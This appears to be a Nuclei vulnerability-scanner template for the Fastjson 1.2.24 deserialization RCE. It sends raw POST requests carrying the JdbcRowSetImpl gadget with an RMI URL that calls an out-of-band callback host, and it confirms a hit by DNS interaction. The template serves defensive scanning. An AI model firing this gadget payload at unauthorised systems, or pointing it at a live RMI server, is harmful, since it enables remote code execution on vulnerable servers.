id: fastjson-1-2-24-rce

info:
  name: Fastjson 1.2.24 Deserialization RCE
  author: zh
  severity: critical
  reference:
    - https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce
    - https://www.freebuf.com/vuls/208339.html
    - https://github.com/wyzxxz/fastjson_rce_tool
  tags: fastjson,rce,deserialization,oast

requests:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
            "b":{
                "@type":"com.sun.rowset.JdbcRowSetImpl",
                "dataSourceName":"rmi://{{interactsh-url}}/Exploit",
                "autoCommit":true
            }
        }

      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
           "@type":"com.sun.rowset.JdbcRowSetImpl",
           "dataSourceName":"rmi://{{interactsh-url}}/Exploit",
           "autoCommit":true
        }

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol   # Confirms DNS Interaction
        words:
          - "dns"

      - type: word
        condition: and
        words:
          - "Internal Server Error"
          - "500"